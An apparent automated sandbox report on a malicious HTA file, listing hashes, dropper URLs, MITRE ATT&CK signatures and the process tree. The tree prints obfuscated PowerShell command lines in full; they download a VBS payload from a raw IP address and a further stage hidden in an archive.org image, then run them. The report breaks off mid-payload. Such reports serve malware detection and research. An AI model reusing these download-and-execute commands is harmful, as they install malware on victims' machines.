c823da80b57d5d3f17dcd82ce4f7895212d0c9942772a7fdd48f0f93af912536

Analysis

max time kernel
14s
max time network
19s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
28-08-2024 08:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IEnetworkopening.hta
Size

115KB
MD5

bb5e68fafbb6252c482af5b689002ead
SHA1

714debd17061508050b6fa9bb38f420b8c9f0de8
SHA256

c823da80b57d5d3f17dcd82ce4f7895212d0c9942772a7fdd48f0f93af912536
SHA512

a1b7d2ba39b9836846da85ac4ab22ddd47d9d7df3ec54c95eaf00d35647d939fd3296bde8bd6ca29c788dd0aab5242d98244058577ff0937028213f61c88cc72
SSDEEP

96:Ea+M7wcrQ1er+1YurUKN8q4TWrTrn1nr88AT:Ea+Qwp131TNf4Ty1oLT

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2856	powershell.exe
6	3060	powershell.exe
7	3060	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2500	powershell.exe
3060	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2856	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2856	powershell.exe
2856	powershell.exe
2856	powershell.exe
2500	powershell.exe
3060	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	3060	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 3068 wrote to memory of 2764	3068	mshta.exe	29
PID 3068 wrote to memory of 2764	3068	mshta.exe	29
PID 3068 wrote to memory of 2764	3068	mshta.exe	29
PID 3068 wrote to memory of 2764	3068	mshta.exe	29
PID 2764 wrote to memory of 2856	2764	cmd.exe	31
PID 2764 wrote to memory of 2856	2764	cmd.exe	31
PID 2764 wrote to memory of 2856	2764	cmd.exe	31
PID 2764 wrote to memory of 2856	2764	cmd.exe	31
PID 2856 wrote to memory of 2316	2856	powershell.exe	32
PID 2856 wrote to memory of 2316	2856	powershell.exe	32
PID 2856 wrote to memory of 2316	2856	powershell.exe	32
PID 2856 wrote to memory of 2316	2856	powershell.exe	32
PID 2316 wrote to memory of 2692	2316	csc.exe	33
PID 2316 wrote to memory of 2692	2316	csc.exe	33
PID 2316 wrote to memory of 2692	2316	csc.exe	33
PID 2316 wrote to memory of 2692	2316	csc.exe	33
PID 2856 wrote to memory of 2988	2856	powershell.exe	35
PID 2856 wrote to memory of 2988	2856	powershell.exe	35
PID 2856 wrote to memory of 2988	2856	powershell.exe	35
PID 2856 wrote to memory of 2988	2856	powershell.exe	35
PID 2988 wrote to memory of 2500	2988	WScript.exe	36
PID 2988 wrote to memory of 2500	2988	WScript.exe	36
PID 2988 wrote to memory of 2500	2988	WScript.exe	36
PID 2988 wrote to memory of 2500	2988	WScript.exe	36
PID 2500 wrote to memory of 3060	2500	powershell.exe	38
PID 2500 wrote to memory of 3060	2500	powershell.exe	38
PID 2500 wrote to memory of 3060	2500	powershell.exe	38
PID 2500 wrote to memory of 3060	2500	powershell.exe	38

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\IEnetworkopening.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:3068
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C POwERsheLL -Ex bYPASS -NoP -W 1 -c DEVIcecRedEnTiALdEploymeNt.ExE ; iEX($(iEX('[SYsTEM.TExT.ENCodiNg]'+[cHAr]58+[CHaR]0x3A+'utf8.gETstRing([SYsteM.convERt]'+[chaR]58+[CHAr]0X3a+'FROMbAse64StrinG('+[chAr]0x22+'JG9UUG1MMWNtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlUmRFRklOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhBUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVRUTWNnUGh5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVZmxuVk5vbFFhVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBzTEtzUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgalIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkNIT3F0VyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1Q295ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9UUG1MMWNtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vOTQuMTQxLjEyMC4xMTEveGFtcHAvRE9NTy9zd2VldG5lc3NvZmNvb2tpZXNtaWxrZWF0aW5nYnltZXdpdGhoZXIudElGIiwiJGVudjpBUFBEQVRBXHN3ZWV0bmVzc29mY29va2llc21pbGtlYXRpbmdieW1ld2l0aC52QlMiLDAsMCk7U3RBcnQtU0xlRXAoMyk7c1RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzd2VldG5lc3NvZmNvb2tpZXNtaWxrZWF0aW5nYnltZXdpdGgudkJTIg=='+[CHar]34+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2764
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    POwERsheLL -Ex bYPASS -NoP -W 1 -c DEVIcecRedEnTiALdEploymeNt.ExE ; iEX($(iEX('[SYsTEM.TExT.ENCodiNg]'+[cHAr]58+[CHaR]0x3A+'utf8.gETstRing([SYsteM.convERt]'+[chaR]58+[CHAr]0X3a+'FROMbAse64StrinG('+[chAr]0x22+'JG9UUG1MMWNtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlUmRFRklOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhBUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVRUTWNnUGh5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVZmxuVk5vbFFhVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBzTEtzUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgalIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkNIT3F0VyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1Q295ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9UUG1MMWNtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vOTQuMTQxLjEyMC4xMTEveGFtcHAvRE9NTy9zd2VldG5lc3NvZmNvb2tpZXNtaWxrZWF0aW5nYnltZXdpdGhoZXIudElGIiwiJGVudjpBUFBEQVRBXHN3ZWV0bmVzc29mY29va2llc21pbGtlYXRpbmdieW1ld2l0aC52QlMiLDAsMCk7U3RBcnQtU0xlRXAoMyk7c1RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzd2VldG5lc3NvZmNvb2tpZXNtaWxrZWF0aW5nYnltZXdpdGgudkJTIg=='+[CHar]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2856
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\txsuanva.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2316
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES40B9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC40B8.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2692
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\sweetnessofcookiesmilkeatingbymewith.vBS"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2988
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J□ ⿉㋃⼏ ⫟Bp□ ⿉㋃⼏ ⫟G0□ ⿉㋃⼏ ⫟YQBn□ ⿉㋃⼏ ⫟GU□ ⿉㋃⼏ ⫟VQBy□ ⿉㋃⼏ ⫟Gw□ ⿉㋃⼏ ⫟I□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟9□ ⿉㋃⼏ ⫟C□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟JwBo□ ⿉㋃⼏ ⫟HQ□ ⿉㋃⼏ ⫟d□ ⿉㋃⼏ ⫟Bw□ ⿉㋃⼏ ⫟HM□ ⿉㋃⼏ ⫟Og□ ⿉㋃⼏ ⫟v□ ⿉㋃⼏ ⫟C8□ ⿉㋃⼏ ⫟aQBh□ ⿉㋃⼏ ⫟Dg□ ⿉㋃⼏ ⫟M□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟z□ ⿉㋃⼏ ⫟DE□ ⿉㋃⼏ ⫟M□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟0□ ⿉㋃⼏ ⫟C4□ ⿉㋃⼏ ⫟dQBz□ ⿉㋃⼏ ⫟C4□ ⿉㋃⼏ ⫟YQBy□ ⿉㋃⼏ ⫟GM□ ⿉㋃⼏ ⫟a□ ⿉㋃⼏ ⫟Bp□ ⿉㋃⼏ ⫟HY□ ⿉㋃⼏ ⫟ZQ□ ⿉㋃⼏ ⫟u□ ⿉㋃⼏ ⫟G8□ ⿉㋃⼏ ⫟cgBn□ ⿉㋃⼏ ⫟C8□ ⿉㋃⼏ ⫟Mg□ ⿉㋃⼏ ⫟3□ ⿉㋃⼏ ⫟C8□ ⿉㋃⼏ ⫟aQB0□ ⿉㋃⼏ ⫟GU□ ⿉㋃⼏ ⫟bQBz□ ⿉㋃⼏ ⫟C8□ ⿉㋃⼏ ⫟dgBi□ ⿉㋃⼏ ⫟HM□ ⿉㋃⼏ ⫟Xw□ ⿉㋃⼏ ⫟y□ ⿉㋃⼏ ⫟D□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟Mg□ ⿉㋃⼏ ⫟0□ ⿉㋃⼏ ⫟D□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟Nw□ ⿉㋃⼏ ⫟y□ ⿉㋃⼏ ⫟DY□ ⿉㋃⼏ ⫟Xw□ ⿉㋃⼏ ⫟y□ ⿉㋃⼏ ⫟D□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟Mg□ ⿉㋃⼏ ⫟0□ ⿉㋃⼏ ⫟D□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟Nw□ ⿉㋃⼏ ⫟y□ ⿉㋃⼏ ⫟DY□ ⿉㋃⼏ ⫟LwB2□ ⿉㋃⼏ ⫟GI□ ⿉㋃⼏ ⫟cw□ ⿉㋃⼏ ⫟u□ ⿉㋃⼏ ⫟Go□ ⿉㋃⼏ ⫟c□ ⿉㋃⼏ ⫟Bn□ ⿉㋃⼏ ⫟Cc□ ⿉㋃⼏ ⫟Ow□ ⿉㋃⼏ ⫟k□ ⿉㋃⼏ ⫟Hc□ ⿉㋃⼏ ⫟ZQBi□ ⿉㋃⼏ ⫟EM□ ⿉㋃⼏ ⫟b□ ⿉㋃⼏ ⫟Bp□ ⿉㋃⼏ ⫟GU□ ⿉㋃⼏ ⫟bgB0□ ⿉㋃⼏ ⫟C□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟PQ□ ⿉㋃⼏ ⫟g□ ⿉㋃⼏ ⫟E4□ ⿉㋃⼏ ⫟ZQB3□ ⿉㋃⼏ ⫟C0□ ⿉㋃⼏ ⫟TwBi□ ⿉㋃⼏ ⫟Go□ ⿉㋃⼏ ⫟ZQBj□ ⿉㋃⼏ ⫟HQ□ ⿉㋃⼏ ⫟I□ ⿉㋃⼏ ⫟BT□ ⿉㋃⼏ ⫟Hk□ ⿉㋃⼏ ⫟cwB0□ ⿉㋃⼏ ⫟GU□ ⿉㋃⼏ ⫟bQ□ ⿉㋃⼏ ⫟u□ ⿉㋃⼏ ⫟E4□ ⿉㋃⼏ ⫟ZQB0□ ⿉㋃⼏ ⫟C4□ ⿉㋃⼏ ⫟VwBl□ ⿉㋃⼏ ⫟GI□ ⿉㋃⼏ ⫟QwBs□ ⿉㋃⼏ ⫟Gk□ ⿉㋃⼏ ⫟ZQBu□ ⿉㋃⼏ ⫟HQ□ ⿉㋃⼏ ⫟Ow□ ⿉㋃⼏ ⫟k□ ⿉㋃⼏ ⫟Gk□ ⿉㋃⼏ ⫟bQBh□ ⿉㋃⼏ ⫟Gc□ ⿉㋃⼏ ⫟ZQBC□ ⿉㋃⼏ ⫟Hk□ ⿉㋃⼏ ⫟d□ ⿉㋃⼏ ⫟Bl□ ⿉㋃⼏ ⫟HM□ ⿉㋃⼏ ⫟I□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟9□ ⿉㋃⼏ ⫟C□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟J□ ⿉㋃⼏ ⫟B3□ ⿉㋃⼏ ⫟GU□ ⿉㋃⼏ ⫟YgBD□ ⿉㋃⼏ ⫟Gw□ ⿉㋃⼏ ⫟aQBl□ ⿉㋃⼏ ⫟G4□ ⿉㋃⼏ ⫟d□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟u□ ⿉㋃⼏ ⫟EQ□ ⿉㋃⼏ ⫟bwB3□ ⿉㋃⼏ ⫟G4□ ⿉㋃⼏ ⫟b□ ⿉㋃⼏ ⫟Bv□ ⿉㋃⼏ ⫟GE□ ⿉㋃⼏ ⫟Z□ ⿉㋃⼏ ⫟BE□ ⿉㋃⼏ ⫟GE□ ⿉㋃⼏ ⫟d□ ⿉㋃⼏ ⫟Bh□ ⿉㋃⼏ ⫟Cg□ ⿉㋃⼏ ⫟J□ ⿉㋃⼏ ⫟Bp□ ⿉㋃⼏ ⫟G0□ ⿉㋃⼏ ⫟YQBn□ ⿉㋃⼏ ⫟GU□ ⿉㋃⼏ ⫟VQBy□ ⿉㋃⼏ ⫟Gw□ ⿉㋃⼏ ⫟KQ□ ⿉㋃⼏ ⫟7□ ⿉㋃⼏ ⫟CQ□ ⿉㋃⼏ ⫟aQBt□ ⿉㋃⼏ ⫟GE□ ⿉㋃⼏ ⫟ZwBl□ ⿉㋃⼏ ⫟FQ□ ⿉㋃⼏ ⫟ZQB4□ ⿉㋃⼏ ⫟HQ□ ⿉㋃⼏ ⫟I□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟9□ ⿉㋃⼏ ⫟C□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟WwBT□ ⿉㋃⼏ ⫟Hk□ ⿉㋃⼏ ⫟cwB0□ ⿉㋃⼏ ⫟GU□ ⿉㋃⼏ ⫟bQ□ ⿉㋃⼏ ⫟u□ ⿉㋃⼏ ⫟FQ□ ⿉㋃⼏ ⫟ZQB4□ ⿉㋃⼏ ⫟HQ□ ⿉㋃⼏ ⫟LgBF□ ⿉㋃⼏ ⫟G4□ ⿉㋃⼏ ⫟YwBv□ ⿉㋃⼏ ⫟GQ□ ⿉㋃⼏ ⫟aQBu□ ⿉㋃⼏ ⫟Gc□ ⿉㋃⼏ ⫟XQ□ ⿉㋃⼏ ⫟6□ ⿉㋃⼏ ⫟Do□ ⿉㋃⼏ ⫟VQBU□ ⿉㋃⼏ ⫟EY□ ⿉㋃⼏ ⫟O□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟u□ ⿉㋃⼏ ⫟Ec□ ⿉㋃⼏ ⫟ZQB0□ ⿉㋃⼏ ⫟FM□ ⿉㋃⼏ ⫟d□ ⿉㋃⼏ ⫟By□ ⿉㋃⼏ ⫟Gk□ ⿉㋃⼏ ⫟bgBn□ ⿉㋃⼏ ⫟Cg□ ⿉㋃⼏ ⫟J□ ⿉㋃⼏ ⫟Bp□ ⿉㋃⼏ ⫟G0□ ⿉㋃⼏ ⫟YQBn□ ⿉㋃⼏ ⫟GU□ ⿉㋃⼏ ⫟QgB5□ ⿉㋃⼏ ⫟HQ□ ⿉㋃⼏ ⫟ZQBz□ ⿉㋃⼏ ⫟Ck□ ⿉㋃⼏ ⫟Ow□ ⿉㋃⼏ ⫟k□ ⿉㋃⼏ ⫟HM□ ⿉㋃⼏ ⫟d□ ⿉㋃⼏ ⫟Bh□ ⿉㋃⼏ ⫟HI□ ⿉㋃⼏ ⫟d□ ⿉㋃⼏ ⫟BG□ ⿉㋃⼏ ⫟Gw□ ⿉㋃⼏ ⫟YQBn□ ⿉㋃⼏ ⫟C□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟PQ□ ⿉㋃⼏ ⫟g□ ⿉㋃⼏ ⫟Cc□ ⿉㋃⼏ ⫟P□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟8□ ⿉㋃⼏ ⫟EI□ ⿉㋃⼏ ⫟QQBT□ ⿉㋃⼏ ⫟EU□ ⿉㋃⼏ ⫟Ng□ ⿉㋃⼏ ⫟0□ ⿉㋃⼏ ⫟F8□ ⿉㋃⼏ ⫟UwBU□ ⿉㋃⼏ ⫟EE□ ⿉㋃⼏ ⫟UgBU□ ⿉㋃⼏ ⫟D4□ ⿉㋃⼏ ⫟Pg□ ⿉㋃⼏ ⫟n□ ⿉㋃⼏ ⫟Ds□ ⿉㋃⼏ ⫟J□ ⿉㋃⼏ ⫟Bl□ ⿉㋃⼏ ⫟G4□ ⿉㋃⼏ ⫟Z□ ⿉㋃⼏ ⫟BG□ ⿉㋃⼏ ⫟Gw□ ⿉㋃⼏ ⫟YQBn□ ⿉㋃⼏ ⫟C□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟PQ□ ⿉㋃⼏ ⫟g□ ⿉㋃⼏ ⫟Cc□ ⿉㋃⼏ ⫟P□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟8□ ⿉㋃⼏ ⫟EI□ ⿉㋃⼏ ⫟QQBT□ ⿉㋃⼏ ⫟EU□ ⿉㋃⼏ ⫟Ng□ ⿉㋃⼏ ⫟0□ ⿉㋃⼏ ⫟F8□ ⿉㋃⼏ ⫟RQBO□ ⿉㋃⼏ ⫟EQ□ ⿉㋃⼏ ⫟Pg□ ⿉㋃⼏ ⫟+□ ⿉㋃⼏ ⫟Cc□ ⿉㋃⼏ ⫟Ow□ ⿉㋃⼏ ⫟k□ ⿉㋃⼏ ⫟HM□ ⿉㋃⼏ ⫟d□ ⿉㋃⼏ ⫟Bh□ ⿉㋃⼏ ⫟HI□ ⿉㋃⼏ ⫟d□ ⿉㋃⼏ ⫟BJ□ ⿉㋃⼏ ⫟G4□ ⿉㋃⼏ ⫟Z□ ⿉㋃⼏ ⫟Bl□ ⿉㋃⼏ ⫟Hg□ ⿉㋃⼏ ⫟I□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟9□ ⿉㋃⼏ ⫟C□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟J□ ⿉㋃⼏ ⫟Bp□ ⿉㋃⼏ ⫟G0□ ⿉㋃⼏ ⫟YQBn□ ⿉㋃⼏ ⫟GU□ ⿉㋃⼏ ⫟V□ ⿉㋃⼏ ⫟Bl□ ⿉㋃⼏ ⫟Hg□ ⿉㋃⼏ ⫟d□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟u□ ⿉㋃⼏ ⫟Ek□ ⿉㋃⼏ ⫟bgBk□ ⿉㋃⼏ ⫟GU□ ⿉㋃⼏ ⫟e□ ⿉㋃⼏ ⫟BP□ ⿉㋃⼏ ⫟GY□ ⿉㋃⼏ ⫟K□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟k□ ⿉㋃⼏ ⫟HM□ ⿉㋃⼏ ⫟d□ ⿉㋃⼏ ⫟Bh□ ⿉㋃⼏ ⫟HI□ ⿉㋃⼏ ⫟d□ ⿉㋃⼏ ⫟BG□ ⿉㋃⼏ ⫟Gw□ ⿉㋃⼏ ⫟YQBn□ ⿉㋃⼏ ⫟Ck□ ⿉㋃⼏ ⫟Ow□ ⿉㋃⼏ ⫟k□ ⿉㋃⼏ ⫟GU□ ⿉㋃⼏ ⫟bgBk□ ⿉㋃⼏ ⫟Ek□ ⿉㋃⼏ ⫟bgBk□ ⿉㋃⼏ ⫟GU□ ⿉㋃⼏ ⫟e□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟g□ ⿉㋃⼏ ⫟D0□ ⿉㋃⼏ ⫟I□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟k□ ⿉㋃⼏ ⫟Gk□ ⿉㋃⼏ ⫟bQBh□ ⿉㋃⼏ ⫟Gc□ ⿉㋃⼏ ⫟ZQBU□ ⿉㋃⼏ ⫟GU□ ⿉㋃⼏ ⫟e□ ⿉㋃⼏ ⫟B0□ ⿉㋃⼏ ⫟C4□ ⿉㋃⼏ ⫟SQBu□ ⿉㋃⼏ ⫟GQ□ ⿉㋃⼏ ⫟ZQB4□ ⿉㋃⼏ ⫟E8□ ⿉㋃⼏ ⫟Zg□ ⿉㋃⼏ ⫟o□ ⿉㋃⼏ ⫟CQ□ ⿉㋃⼏ ⫟ZQBu□ ⿉㋃⼏ ⫟GQ□ ⿉㋃⼏ ⫟RgBs□ ⿉㋃⼏ ⫟GE□ ⿉㋃⼏ ⫟Zw□ ⿉㋃⼏ ⫟p□ ⿉㋃⼏ ⫟Ds□ ⿉㋃⼏ ⫟J□ ⿉㋃⼏ ⫟Bz□ ⿉㋃⼏ ⫟HQ□ ⿉㋃⼏ ⫟YQBy□ ⿉㋃⼏ ⫟HQ□ ⿉㋃⼏ ⫟SQBu□ ⿉㋃⼏ ⫟GQ□ ⿉㋃⼏ ⫟ZQB4□ ⿉㋃⼏ ⫟C□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟LQBn□ ⿉㋃⼏ ⫟GU□ ⿉㋃⼏ ⫟I□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟w□ ⿉㋃⼏ ⫟C□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟LQBh□ ⿉㋃⼏ ⫟G4□ ⿉㋃⼏ ⫟Z□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟g□ ⿉㋃⼏ ⫟CQ□ ⿉㋃⼏ ⫟ZQBu□ ⿉㋃⼏ ⫟GQ□ ⿉㋃⼏ ⫟SQBu□ ⿉㋃⼏ ⫟GQ□ ⿉㋃⼏ ⫟ZQB4□ ⿉㋃⼏ ⫟C□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟LQBn□ ⿉㋃⼏ ⫟HQ□ ⿉㋃⼏ ⫟I□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟k□ ⿉㋃⼏ ⫟HM□ ⿉㋃⼏ ⫟d□ ⿉㋃⼏ ⫟Bh□ ⿉㋃⼏ ⫟HI□ ⿉㋃⼏ ⫟d□ ⿉㋃⼏ ⫟BJ□ ⿉㋃⼏ ⫟G4□ ⿉㋃⼏ ⫟Z□ ⿉㋃⼏ ⫟Bl□ ⿉㋃⼏ ⫟Hg□ ⿉㋃⼏ ⫟Ow□ ⿉㋃⼏ ⫟k□ ⿉㋃⼏ ⫟HM□ ⿉㋃⼏ ⫟d□ ⿉㋃⼏ ⫟Bh□ ⿉㋃⼏ ⫟HI□ ⿉㋃⼏ ⫟d□ ⿉㋃⼏ ⫟BJ□ ⿉㋃⼏ ⫟G4□ ⿉㋃⼏ ⫟Z□ ⿉㋃⼏ ⫟Bl□ ⿉㋃⼏ ⫟Hg□ ⿉㋃⼏ ⫟I□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟r□ ⿉㋃⼏ ⫟D0□ ⿉㋃⼏ ⫟I□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟k□ ⿉㋃⼏ ⫟HM□ ⿉㋃⼏ ⫟d□ ⿉㋃⼏ ⫟Bh□ ⿉㋃⼏ ⫟HI□ ⿉㋃⼏ ⫟d□ ⿉㋃⼏ ⫟BG□ ⿉㋃⼏ ⫟Gw□ ⿉㋃⼏ ⫟YQBn□ ⿉㋃⼏ ⫟C4□ ⿉㋃⼏ ⫟T□ ⿉㋃⼏ ⫟Bl□ ⿉㋃⼏ ⫟G4□ ⿉㋃⼏ ⫟ZwB0□ ⿉㋃⼏ ⫟Gg□ ⿉㋃⼏ ⫟Ow□ ⿉㋃⼏ ⫟k□ ⿉㋃⼏ ⫟GI□ ⿉㋃⼏ ⫟YQBz□ ⿉㋃⼏ ⫟GU□ ⿉㋃⼏ ⫟Ng□ ⿉㋃⼏ ⫟0□ ⿉㋃⼏ ⫟Ew□ ⿉㋃⼏ ⫟ZQBu□ ⿉㋃⼏ ⫟Gc□ ⿉㋃⼏ ⫟d□ ⿉㋃⼏ ⫟Bo□ ⿉㋃⼏ ⫟C□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟PQ□ ⿉㋃⼏ ⫟g□ ⿉㋃⼏ ⫟CQ□ ⿉㋃⼏ ⫟ZQBu□ ⿉㋃⼏ ⫟GQ□ ⿉㋃⼏ ⫟SQBu□ ⿉㋃⼏ ⫟GQ□ ⿉㋃⼏ ⫟ZQB4□ ⿉㋃⼏ ⫟C□ ⿉㋃⼏ ⫟□ ⿉㋃⼏ ⫟LQ□ ⿉㋃⼏ ⫟g□ ⿉㋃⼏ ⫟CQ□ ⿉㋃⼏ ⫟cwB0□ ⿉㋃⼏ ⫟GE□ 